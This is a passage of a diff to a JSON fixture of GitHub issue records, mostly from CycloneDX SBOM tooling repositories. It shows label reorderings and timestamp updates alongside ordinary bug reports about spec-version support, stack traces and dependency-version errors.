}, @@ -76352,8 +76357,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76385,8 +76390,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76418,8 +76423,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76451,8 +76456,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76484,8 +76489,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76517,8 +76522,8 @@ 1155 ], "labels": [ - 471, - 479 + 479, + 471 ] } }, @@ -76527,7 +76532,7 @@ "pk": 2506, "fields": { "nest_created_at": "2024-09-11T22:53:12.023Z", - "nest_updated_at": "2024-09-18T18:54:54.916Z", + "nest_updated_at": "2024-09-22T18:42:33.788Z", "node_id": "I_kwDOEfOVxc6VO668", "title": "[TOOL REQUEST]: Port Scanner", "body": "### Tool Name\n\nNaabu\n\n### GitHub Repository\n\nhttps://github.com/projectdiscovery/naabu\n\n### Type\n\nNetwork VAPT\n\n### Additional Information\n\n_No response_\n\n### Purpose of the Tool\n\nA fast port scanner written in go with a focus on reliability and simplicity. Designed to be used in combination with other tools for attack surface discovery in bug bounties and pentests", @@ -76560,7 +76565,7 @@ "pk": 2507, "fields": { "nest_created_at": "2024-09-11T22:53:20.632Z", - "nest_updated_at": "2024-09-18T18:54:59.855Z", + "nest_updated_at": "2024-09-22T18:42:40.759Z", "node_id": "I_kwDOCPsiK86JUlc7", "title": "关于安装问题", "body": "视频讲解安装过程纯属多余,直接写脚本代码就好了。", @@ -76672,7 +76677,7 @@ "pk": 2511, "fields": { "nest_created_at": "2024-09-11T22:53:55.174Z", - "nest_updated_at": "2024-09-18T18:55:36.455Z", + "nest_updated_at": "2024-09-22T18:43:39.997Z", "node_id": "MDU6SXNzdWU3MTkxNDkwNDQ=", "title": "Add issue/slack option for new PR ideas to the contributing guidelines", "body": "Need to add something about discussing changes before raising a significant PR that doesn't have a corresponding issue to the contributing guidelines.", @@ -76926,7 +76931,7 @@ "pk": 2520, "fields": { "nest_created_at": "2024-09-11T22:54:10.646Z", - "nest_updated_at": "2024-09-18T18:55:43.893Z", + "nest_updated_at": "2024-09-22T18:43:50.344Z", "node_id": "I_kwDOEO8q986OvASG", "title": "Add CycloneDX SBOMs example for version supporting 1.5 and 1.6", "body": "Currently there are are [SBOM](https://github.com/CycloneDX/bom-examples/tree/master/SBOM) CycloneDX examples of version <1.4. It would be great to add more examples supporting CycloneDX version 1.5 and 1.6.", @@ -78253,7 +78258,7 @@ "pk": 2567, "fields": { "nest_created_at": "2024-09-11T22:54:57.167Z", - "nest_updated_at": "2024-09-18T18:55:48.137Z", + "nest_updated_at": "2024-09-22T07:41:22.465Z", "node_id": "I_kwDODcOhp85i4Zob", "title": "[Maven] In a multi-module project, the root component is incorrect", "body": "When using `cdxgen` for a multi-module project, the root component in the generated SBOM is one of the child modules rather than the parent module. Upon further inspection, the SBOM generated by the Maven plugin (located in the `target` folder) is correct, but the version in the root folder (modified by `cdxgen`) is incorrect.\r\n\r\nI don't yet have a reproducer but I'll see if I can come up with one. ", @@ -83822,8 +83827,8 @@ "assignees": [], "labels": [ 480, - 486, - 497 + 497, + 486 ] } }, @@ -83972,8 +83977,8 @@ "repository": 1246, "assignees": [], "labels": [ - 484, - 499 + 499, + 484 ] } }, @@ -84274,8 +84279,8 @@ "labels": [ 480, 483, - 487, - 494 + 494, + 487 ] } }, @@ -84337,8 +84342,8 @@ "assignees": [], "labels": [ 480, - 484, - 504 + 504, + 484 ] } }, @@ -84371,8 +84376,8 @@ ], "labels": [ 480, - 484, - 489 + 489, + 484 ] } }, @@ -84492,8 +84497,8 @@ "repository": 1246, "assignees": [], "labels": [ - 484, - 505 + 505, + 484 ] } }, @@ -84523,9 +84528,9 @@ "repository": 1246, "assignees": [], "labels": [ + 504, 484, - 492, - 504 + 492 ] } }, @@ -84555,9 +84560,9 @@ "repository": 1246, "assignees": [], "labels": [ + 506, 484, - 492, - 506 + 492 ] } }, @@ -84843,8 +84848,8 @@ "repository": 1246, "assignees": [], "labels": [ - 484, - 507 + 507, + 484 ] } }, @@ -84995,8 +85000,8 @@ 1238 ], "labels": [ - 484, - 498 + 498, + 484 ] } }, @@ -85577,8 +85582,8 @@ "repository": 1246, "assignees": [], "labels": [ - 486, - 509 + 509, + 486 ] } }, @@ -85697,8 +85702,8 @@ "repository": 1246, "assignees": [], "labels": [ - 484, - 506 + 506, + 484 ] } }, @@ -85961,7 +85966,7 @@ "pk": 2831, "fields": { "nest_created_at": "2024-09-11T23:15:46.009Z", - "nest_updated_at": "2024-09-18T18:56:01.917Z", + "nest_updated_at": "2024-09-22T18:44:38.602Z", "node_id": "I_kwDODc9ODc6PsQMs", "title": "Unable to add components", "body": "When I click on the add component button nothing happens\r\n![dep bug](https://github.com/user-attachments/assets/7d6e5b62-4c3d-4194-8484-71f68268890c)\r\n", @@ -86133,7 +86138,7 @@ "pk": 2837, "fields": { "nest_created_at": "2024-09-11T23:15:56.072Z", - "nest_updated_at": "2024-09-18T18:56:06.002Z", + "nest_updated_at": "2024-09-22T18:44:43.471Z", "node_id": "I_kwDOFiI5QM6Gn0EK", "title": "Spec 1.5 is not supported", "body": "I'm trying to deploy this repo server and I'm facing an issue. I currently create the Bom file using trivy in my pipeline, and then I run this to add it to the repo:\r\n\r\n`curl -v -X POST -H \"Content-Type:application/json\" -d @trivy_report.json http://10.63.28.54:80/v1/bomexchange`\r\n\r\nI've tried both /v1/bom and /v1/bomexchange, as both seem to do the same thing according to the documentation, and I get the same error in both of them:\r\n\r\n> fail: Microsoft.AspNetCore.Server.Kestrel[13]\r\n Connection id \"0HN33G40CVVP8\", Request id \"0HN33G40CVVP8:00000002\": An unhandled exception was thrown by the application.\r\n System.ArgumentException: Unsupported specification version: 1.5\r\n at CycloneDX.Models.Bom.set_SpecVersionString(String value)\r\n at System.Text.Json.Serialization.Metadata.JsonPropertyInfo`1.ReadJsonAndSetMember(Object obj, ReadStack& state, Utf8JsonReader& reader)\r\n at System.Text.Json.Serialization.Converters.ObjectDefaultConverter`1.OnTryRead(Utf8JsonReader& reader, Type typeToConvert, JsonSerializerOptions options, ReadStack& state, T& value)\r\n at System.Text.Json.Serialization.JsonConverter`1.TryRead(Utf8JsonReader& reader, Type typeToConvert, JsonSerializerOptions options, ReadStack& state, T& value)\r\n at System.Text.Json.Serialization.JsonConverter`1.ReadCore(Utf8JsonReader& reader, JsonSerializerOptions options, ReadStack& state)\r\n at System.Text.Json.JsonSerializer.ReadFromSpan[TValue](ReadOnlySpan`1 utf8Json, JsonTypeInfo jsonTypeInfo, Nullable`1 actualByteCount)\r\n at System.Text.Json.JsonSerializer.ReadFromSpan[TValue](ReadOnlySpan`1 json, JsonTypeInfo jsonTypeInfo)\r\n at System.Text.Json.JsonSerializer.Deserialize[TValue](String json, JsonSerializerOptions options)\r\n at CycloneDX.Json.Serializer.Deserialize(String jsonString)\r\n at CycloneDX.BomRepoServer.Controllers.BomExchangeController.Post() in /app/src/CycloneDX.BomRepoServer/Controllers/BomExchangeController.cs:line 151\r\n at lambda_method21(Closure , Object )\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ActionMethodExecutor.TaskOfActionResultExecutor.Execute(IActionResultTypeMapper mapper, ObjectMethodExecutor executor, Object controller, Object[] arguments)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.g__Awaited|12_0(ControllerActionInvoker invoker, ValueTask`1 actionResultValueTask)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.g__Awaited|10_0(ControllerActionInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Rethrow(ActionExecutedContextSealed context)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.Next(State& next, Scope& scope, Object& state, Boolean& isCompleted)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ControllerActionInvoker.g__Awaited|13_0(ControllerActionInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.g__Awaited|20_0(ResourceInvoker invoker, Task lastTask, State next, Scope scope, Object state, Boolean isCompleted)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.g__Awaited|17_0(ResourceInvoker invoker, Task task, IDisposable scope)\r\n at Microsoft.AspNetCore.Mvc.Infrastructure.ResourceInvoker.g__Awaited|17_0(ResourceInvoker invoker, Task task, IDisposable scope)\r\n at Microsoft.AspNetCore.Routing.EndpointMiddleware.g__AwaitRequestTask|6_0(Endpoint endpoint, Task requestTask, ILogger logger)\r\n at Microsoft.AspNetCore.Authorization.AuthorizationMiddleware.Invoke(HttpContext context)\r\n at Swashbuckle.AspNetCore.SwaggerUI.SwaggerUIMiddleware.Invoke(HttpContext httpContext)\r\n at Swashbuckle.AspNetCore.Swagger.SwaggerMiddleware.Invoke(HttpContext httpContext, ISwaggerProvider swaggerProvider)\r\n at Microsoft.AspNetCore.Server.Kestrel.Core.Internal.Http.HttpProtocol.ProcessRequests[TContext](IHttpApplication`1 application)\r\n\r\n\r\nI've found this [issue](https://github.com/CycloneDX/cyclonedx-cli/issues/324) that shows the same error in cyclonedx-cli. Is this an issue in this case as well?\r\n", @@ -88439,7 +88444,7 @@ "pk": 2918, "fields": { "nest_created_at": "2024-09-11T23:17:35.386Z", - "nest_updated_at": "2024-09-18T18:56:15.296Z", + "nest_updated_at": "2024-09-22T18:44:55.325Z", "node_id": "I_kwDOEkH8ic6Nn4fO", "title": "cyclonedx merge command does not support v1.6 format", "body": "When you try merge two files in 1.6 version, you get:\r\n```\r\nUnhandled exception: System.ArgumentException: Unsupported specification version: 1.6\r\n at CycloneDX.Models.Bom.set_SpecVersionString(String value)\r\n...\r\n```\r\n[cyclonedx-merge-stacktrace.txt](https://github.com/user-attachments/files/15993989/cyclonedx-merge-stacktrace.txt)\r\n", @@ -88799,8 +88804,8 @@ "repository": 1253, "assignees": [], "labels": [ - 519, - 520 + 520, + 519 ] } }, @@ -88809,7 +88814,7 @@ "pk": 2931, "fields": { "nest_created_at": "2024-09-11T23:18:47.534Z", - "nest_updated_at": "2024-09-18T18:56:27.868Z", + "nest_updated_at": "2024-09-22T18:45:17.157Z", "node_id": "I_kwDOK6N9QM5519PA", "title": ":mega: looking for contributors", "body": "This project is currently looking for contributors.\r\n\r\nDrop a note, or ping, if you are interested.", @@ -89594,9 +89599,9 @@ "repository": 1257, "assignees": [], "labels": [ + 528, 526, - 527, - 528 + 527 ] } }, @@ -89626,8 +89631,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -89657,8 +89662,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -89720,8 +89725,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 529 + 529, + 526 ] } }, @@ -89751,8 +89756,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -89842,8 +89847,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -90150,7 +90155,7 @@ "pk": 2976, "fields": { "nest_created_at": "2024-09-11T23:19:54.902Z", - "nest_updated_at": "2024-09-11T23:19:54.902Z", + "nest_updated_at": "2024-09-22T07:43:03.653Z", "node_id": "I_kwDOCQUYa85T-OTL", "title": "System.IO.InvalidDataException: Central Directory corrupt with 2.4.1", "body": "Hi,\r\n\r\nusing version 2.4.1 some of our builds are failing due to a `System.IO.InvalidDataException` exception. Those builds were working using version 2.3.0 and are still working if we fix the version to 2.3.0. We observed this exception in two different projects for different dependencies:\r\n```\r\nRetrieving GitHub license for repository nspec/NSpec and ref master\r\nUnhandled exception. System.IO.InvalidDataException: Central Directory corrupt.\r\n ---> System.IO.IOException: An attempt was made to move the position before the beginning of the stream.\r\n at System.IO.MemoryStream.Seek(Int64 offset, SeekOrigin loc)\r\n at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\r\n --- End of inner exception stack trace ---\r\n at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\r\n at System.IO.Compression.ZipArchive.Init(Stream stream, ZipArchiveMode mode, Boolean leaveOpen)\r\n at System.IO.Compression.ZipArchive..ctor(Stream stream, ZipArchiveMode mode, Boolean leaveOpen, Encoding entryNameEncoding)\r\n at CycloneDX.Services.NugetV3Service.GetNuspec(String name, String version, String nuspecFilename, FindPackageByIdResource resource) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 315\r\n at CycloneDX.Services.NugetV3Service.GetNuspec(String name, String version, String nuspecFilename, FindPackageByIdResource resource) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 315\r\n at CycloneDX.Services.NugetV3Service.GetComponentAsync(String name, String version, Nullable`1 scope) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 231\r\n at CycloneDX.Services.NugetV3Service.GetComponentAsync(NugetPackage nugetPackage) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 322\r\n at CycloneDX.Program.OnExecuteAsync(CommandLineApplication app) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Program.cs:line 281\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.InvokeAsync(MethodInfo method, Object instance, Object[] arguments)\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.OnExecute(ConventionContext context, CancellationToken cancellationToken)\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.<>c__DisplayClass0_0.<b__0>d.MoveNext()\r\n--- End of stack trace from previous location where exception was thrown ---\r\n at McMaster.Extensions.CommandLineUtils.CommandLineApplication.ExecuteAsync(String[] args, CancellationToken cancellationToken)\r\n at McMaster.Extensions.CommandLineUtils.CommandLineApplication.ExecuteAsync[TApp](CommandLineContext context, CancellationToken cancellationToken)\r\n at CycloneDX.Program.Main(String[] args) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Program.cs:line 130\r\n at CycloneDX.Program.
(String[] args)\r\n```\r\nand\r\n```\r\nRetrieving GitHub license for repository IdentityServer/IdentityServer3.AccessTokenValidation and ref master\r\nUnhandled exception. System.IO.InvalidDataException: Central Directory corrupt.\r\n ---> System.IO.IOException: An attempt was made to move the position before the beginning of the stream.\r\n at System.IO.MemoryStream.Seek(Int64 offset, SeekOrigin loc)\r\n at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\r\n --- End of inner exception stack trace ---\r\n at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\r\n at System.IO.Compression.ZipArchive..ctor(Stream stream, ZipArchiveMode mode, Boolean leaveOpen, Encoding entryNameEncoding)\r\n at System.IO.Compression.ZipArchive..ctor(Stream stream, ZipArchiveMode mode, Boolean leaveOpen)\r\n at NuGet.Packaging.PackageArchiveReader..ctor(Stream stream, Boolean leaveStreamOpen, IFrameworkNameProvider frameworkProvider, IFrameworkCompatibilityProvider compatibilityProvider)\r\n at NuGet.Packaging.PackageArchiveReader..ctor(Stream stream)\r\n at CycloneDX.Services.NugetV3Service.GetNuspec(String name, String version, String nuspecFilename, FindPackageByIdResource resource) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 273\r\n at CycloneDX.Services.NugetV3Service.GetNuspec(String name, String version, String nuspecFilename, FindPackageByIdResource resource) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 279\r\n at CycloneDX.Services.NugetV3Service.GetComponentAsync(String name, String version, Nullable`1 scope) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 231\r\n at CycloneDX.Services.NugetV3Service.GetComponentAsync(NugetPackage nugetPackage) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Services/NugetV3Service.cs:line 320\r\n at CycloneDX.Program.OnExecuteAsync(CommandLineApplication app) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Program.cs:line 281\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.InvokeAsync(MethodInfo method, Object instance, Object[] arguments)\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.OnExecute(ConventionContext context, CancellationToken cancellationToken)\r\n at McMaster.Extensions.CommandLineUtils.Conventions.ExecuteMethodConvention.<>c__DisplayClass0_0.<b__0>d.MoveNext()\r\n--- End of stack trace from previous location ---\r\n at McMaster.Extensions.CommandLineUtils.CommandLineApplication.ExecuteAsync(String[] args, CancellationToken cancellationToken)\r\n at McMaster.Extensions.CommandLineUtils.CommandLineApplication.ExecuteAsync[TApp](CommandLineContext context, CancellationToken cancellationToken)\r\n at CycloneDX.Program.Main(String[] args) in /home/runner/work/cyclonedx-dotnet/cyclonedx-dotnet/CycloneDX/Program.cs:line 130\r\n at CycloneDX.Program.
(String[] args)\r\n```\r\n\r\nThe builds are running in Azure Pipelines on Linux Build Servers inside Docker containers based on `mcr.microsoft.com/dotnet/sdk:3.1`. We tried using `mcr.microsoft.com/dotnet/sdk:6.0` as the container image but faced the same error message.\r\n\r\nThank you in advance!", @@ -90163,10 +90168,10 @@ "sequence_id": 1408820427, "is_locked": false, "lock_reason": "", - "comments_count": 38, + "comments_count": 39, "closed_at": null, "created_at": "2022-10-14T06:12:04Z", - "updated_at": "2024-09-04T15:05:56Z", + "updated_at": "2024-09-19T01:51:45Z", "author": 1330, "repository": 1257, "assignees": [], @@ -90525,10 +90530,10 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 527, 529, - 531 + 531, + 526, + 527 ] } }, @@ -90586,10 +90591,10 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 527, 529, - 531 + 531, + 526, + 527 ] } }, @@ -90797,10 +90802,10 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 527, 529, - 531 + 531, + 526, + 527 ] } }, @@ -90860,8 +90865,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -90921,8 +90926,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -90983,8 +90988,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 528 + 528, + 526 ] } }, @@ -90993,7 +90998,7 @@ "pk": 3004, "fields": { "nest_created_at": "2024-09-11T23:20:34.278Z", - "nest_updated_at": "2024-09-11T23:20:34.278Z", + "nest_updated_at": "2024-09-22T18:45:36.281Z", "node_id": "I_kwDOCQUYa86NLTin", "title": "Read version from project file", "body": "Maybe, if the bom is generated from a csproj, it should be possible to get the version from projectfile for the metadata.", @@ -91006,15 +91011,16 @@ "sequence_id": 2368551079, "is_locked": false, "lock_reason": "", - "comments_count": 0, + "comments_count": 1, "closed_at": null, "created_at": "2024-06-23T13:01:11Z", - "updated_at": "2024-06-23T13:01:21Z", + "updated_at": "2024-09-22T01:32:38Z", "author": 1331, "repository": 1257, "assignees": [], "labels": [ - 533 + 533, + 528 ] } }, @@ -91075,8 +91081,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 529 + 529, + 526 ] } }, @@ -91106,8 +91112,8 @@ "repository": 1257, "assignees": [], "labels": [ - 526, - 529 + 529, + 526 ] } }, @@ -91198,9 +91204,9 @@ "repository": 1257, "assignees": [], "labels": [ + 529, 526, - 527, - 529 + 527 ] } }, @@ -91230,8 +91236,8 @@ "repository": 1257, "assignees": [], "labels": [ - 529, - 534 + 534, + 529 ] } }, @@ -91470,7 +91476,7 @@ "pk": 3020, "fields": { "nest_created_at": "2024-09-11T23:21:37.656Z", - "nest_updated_at": "2024-09-18T18:56:43.296Z", + "nest_updated_at": "2024-09-22T18:45:53.738Z", "node_id": "I_kwDOEjOIWM6GYbe8", "title": "Support cdx 1.6", "body": "- [x] The ToolChoices de-/serializer could be removed again (just introduced for a workaround)\r\n- [x] Check review remarks on cdx1.6 branch\r\n- [x] Check Codacy Issues\r\n- [x] EnumerateAllComponents needs to be updated as there are more places where components can be used (Formulation>Components, Declarations>Target>Components, Vulnerabilities>Tools>Components, Annotations>Annotator>Component etc.) Maybe similar for services.\r\n- [x] Check new snapshots\r\n\r\nThis is what should still be open. @andreas-hilti is there anything I am missing?\r\n\r\nAnother issue is that some 1.5 types are not set up to merge yet, but we can fix this next.", @@ -91820,7 +91826,7 @@ "pk": 3032, "fields": { "nest_created_at": "2024-09-11T23:22:31.130Z", - "nest_updated_at": "2024-09-18T18:56:48.677Z", + "nest_updated_at": "2024-09-22T18:46:05.968Z", "node_id": "I_kwDOLjDGs86C_m8X", "title": "if JS: publish to npmjs", "body": "if implementation done in JavaScript:\r\npublish as `@cyclonedx/esbuild-plugin` on \r\n\r\n!!! Undecided whether implementation will be in Go or JS....\r\n\r\n\r\n> If you want to share your esbuild plugin, you should:\r\n> 1. [Publish it to npm](https://docs.npmjs.com/creating-and-publishing-unscoped-public-packages) so others can install it.\r\n Add it to the [list of existing esbuild plugins](https://github.com/esbuild/community-plugins) so others can find it.\r\n> 2. [...]", @@ -91994,8 +92000,8 @@ "repository": 1260, "assignees": [], "labels": [ - 542, - 544 + 544, + 542 ] } }, @@ -92055,8 +92061,8 @@ "repository": 1260, "assignees": [], "labels": [ - 542, - 545 + 545, + 542 ] } }, @@ -92121,7 +92127,7 @@ "pk": 3042, "fields": { "nest_created_at": "2024-09-11T23:22:48.428Z", - "nest_updated_at": "2024-09-18T18:56:53.199Z", + "nest_updated_at": "2024-09-22T18:46:10.921Z", "node_id": "I_kwDOFH0v1M6QGNp7", "title": "Inconsistent authors handling for 1.5", "body": "CycloneDX 1.6 has deprecated the `component.author` in favor of `component.authors`, but this is handled somewhat inconsistently and incorrectly when outputting earlier versions.\r\n\r\nWhen specifying the `authors` for a component, but not specifying an `author`, this is dropped. I suppose this is somewhat expected since it's going from a list to a single value, but there could be some logic to, say, take the first name as the `author`.\r\n\r\nSecondly, when specifying the `authors` for a component within the `metadata.tools`, it is still output in 1.5. Is there something else I should be doing here?\r\n\r\nIs the guidance here to set both `author` and `authors.name` for maximum compatibility? Or something else?\r\n\r\nUsing version `v0.9.0` of this library, here's an example program:\r\n\r\n```golang\r\npackage main\r\n\r\nimport (\r\n\t\"os\"\r\n\r\n\t\"github.com/CycloneDX/cyclonedx-go\"\r\n)\r\n\r\nfunc main() {\r\n\tbom := cyclonedx.BOM{\r\n\t\tMetadata: &cyclonedx.Metadata{\r\n\t\t\tTimestamp: \"\",\r\n\t\t\tLifecycles: nil,\r\n\t\t\tTools: &cyclonedx.ToolsChoice{\r\n\t\t\t\tComponents: &[]cyclonedx.Component{\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tAuthors: &[]cyclonedx.OrganizationalContact{\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tName: \"some-author-1\",\r\n\t\t\t\t\t\t\t},\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t},\r\n\t\tComponents: &[]cyclonedx.Component{\r\n\t\t\t{\r\n\t\t\t\tAuthors: &[]cyclonedx.OrganizationalContact{\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tName: \"some-author-2\",\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t},\r\n\t}\r\n\r\n\tenc := cyclonedx.NewBOMEncoder(os.Stdout, cyclonedx.BOMFileFormatJSON)\r\n\tenc.SetPretty(true)\r\n\tenc.SetEscapeHTML(false)\r\n\t_ = enc.EncodeVersion(&bom, cyclonedx.SpecVersion1_5)\r\n}\r\n```\r\n\r\noutputs:\r\n```json\r\n{\r\n \"$schema\": \"http://cyclonedx.org/schema/bom-1.5.schema.json\",\r\n \"bomFormat\": \"\",\r\n \"specVersion\": \"1.5\",\r\n \"version\": 0,\r\n \"metadata\": {\r\n \"tools\": {\r\n \"components\": [\r\n {\r\n \"type\": \"\",\r\n \"authors\": [\r\n {\r\n \"name\": \"some-author-1\"\r\n }\r\n ],\r\n \"name\": \"\"\r\n }\r\n ]\r\n }\r\n },\r\n \"components\": [\r\n {\r\n \"type\": \"application\",\r\n \"name\": \"\"\r\n }\r\n ]\r\n}\r\n```\r\n", @@ -92714,23 +92720,23 @@ "pk": 3062, "fields": { "nest_created_at": "2024-09-11T23:23:28.465Z", - "nest_updated_at": "2024-09-18T18:56:58.537Z", + "nest_updated_at": "2024-09-22T18:46:20.006Z", "node_id": "I_kwDOFJbjr86VLDNM", "title": "Incorrect version of xorm dependencies are reported in SBOM", "body": "Hi Team,\r\nAm currently working on hardening grafana image and I found one discrepancy in cyclonedx-gomod.\r\nI am using grafana version v10.2.3 and in that version one dependencies is used called xorm.io/xorm of version v0.8.2\r\n (https://github.com/grafana/grafana/blob/1e84fede543acc892d2a2515187e545eb047f237/go.mod#L130)\r\n \r\nWhen I run the go scanner on this source code, sbom gets generated but with the incorrect component version of xorm.io/xorm\r\n![image](https://github.com/user-attachments/assets/47bce3af-13e9-47e9-8af1-69a9a49a1328)\r\n\r\nAs the version v10.2.3 doesn't exist for xorm.io, so I can't submit sbom for further processing.\r\n \r\n", "summary": "Identify the discrepancy in the CycloneDX SBOM generated for the Grafana image, specifically the incorrect reporting of the xorm.io/xorm dependency version when using Grafana version v10.2.3. Confirm that the actual version in use is v0.8.2, as indicated in the go.mod file, and verify that v10.2.3 is not an existing version for xorm.io. Address the issue to ensure accurate SBOM generation for proper submission and processing.", "hint": "To address the issue of incorrect xorm dependencies being reported in the SBOM for the Grafana image, you can follow these steps:\n\n1. **Verify the Go Module**: Check the `go.mod` file of the Grafana project to confirm the specified version of `xorm.io/xorm` and ensure that it is correctly listed as v0.8.2.\n\n2. **Inspect the Dependency Tree**: Use `go mod graph` to visualize the dependency tree and check if there are any indirect dependencies pulling in the wrong version of `xorm`.\n\n3. **Check for Transitive Dependencies**: Identify if any other dependencies in the Grafana project require an incompatible version of `xorm.io/xorm`. This can be done using `go mod why xorm.io/xorm`.\n\n4. **Review SBOM Generation Process**: Examine the tool or method you are using to generate the SBOM. Ensure that the tool is correctly interpreting the `go.mod` file and capturing the right dependency versions.\n\n5. **Update Go Modules**: If there are discrepancies, try running `go get -u` or `go mod tidy` to update the dependencies and clean up the `go.mod` file.\n\n6. **Check for Local Changes**: Ensure that there are no local modifications in your environment affecting the dependency resolution. This includes checking for any local replacements in the `go.mod` file.\n\n7. **Test with a Clean Environment**: Generate the SBOM in a clean environment (such as a Docker container) to rule out any local configuration issues.\n\n8. **Review Documentation**: Consult the documentation for the SBOM generation tool you are using to ensure you are following the recommended practices for Go modules.\n\n9. **Raise an Issue**: If the problem persists, consider raising an issue in the repository of the SBOM tool or Grafana, providing details about the incorrect version and steps to reproduce the issue.\n\n10. **Monitor for Updates**: Keep an eye on updates from Grafana and the SBOM tool, as future releases may address any underlying issues with dependency resolution.\n\nFollowing these steps should help you identify the source of the discrepancy and facilitate a resolution for the incorrect xorm dependency version in the SBOM.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/CycloneDX/cyclonedx-gomod/issues/518", "number": 518, "sequence_id": 2502701900, "is_locked": false, "lock_reason": "", - "comments_count": 3, - "closed_at": null, + "comments_count": 4, + "closed_at": "2024-09-20T10:29:15Z", "created_at": "2024-09-03T12:05:44Z", - "updated_at": "2024-09-14T10:14:14Z", + "updated_at": "2024-09-20T10:29:16Z", "author": 1371, "repository": 1261, "assignees": [], @@ -94365,7 +94371,7 @@ "pk": 3119, "fields": { "nest_created_at": "2024-09-11T23:25:05.197Z", - "nest_updated_at": "2024-09-18T18:57:03.215Z", + "nest_updated_at": "2024-09-22T18:46:27.749Z", "node_id": "I_kwDOCBLsjM6T0T5W", "title": "NPE fails build during cyclonedxBom task", "body": "**Describe the bug**\r\nSince v1.10.0 the `cyclonedxBom` fails the build because `An unexpected issue occurred attempting to create a PackageURL for org.jetbrains.kotlin:kotlin-native-prebuilt:2.0.10`. The message appeared already in v1.9.0 and v1.8.10 without failing the build.\r\n\r\n**To Reproduce**\r\nthe build.toml:\r\n```\r\n[versions]\r\nkotlin = \"2.0.10\"\r\npayfreeCommonKotlin = \"v2.0.0\"\r\nkotlinLogging = \"3.0.5\"\r\nmockk = \"1.13.12\"\r\nspringBoot = \"3.3.2\"\r\nspringdoc = \"2.6.0\"\r\nspringSbom = \"1.10.0\"\r\nspringDependencyManagement = \"1.1.6\"\r\n\r\n[libraries]\r\n# kotlin\r\nkotlin-bom = { module = \"org.jetbrains.kotlin:kotlin-bom\" }\r\nkotlin-logging = { module = \"io.github.microutils:kotlin-logging\", version.ref = \"kotlinLogging\" }\r\nkotlin-test = { module = \"org.jetbrains.kotlin:kotlin-test\" }\r\nkotlin-junit5 = { module = \"org.jetbrains.kotlin:kotlin-test-junit5\" }\r\njunit = { module = \"org.junit.jupiter:junit-jupiter-engine\" }\r\nkotlin-test-coroutines = { module = \"org.jetbrains.kotlinx:kotlinx-coroutines-test\" }\r\nkotlin-test-mockk = { module = \"io.mockk:mockk\", version.ref = \"mockk\" }\r\n\r\n# spring\r\nspring-boot-bom = { module = \"org.springframework.boot:spring-boot-dependencies\", version.ref = \"springBoot\" 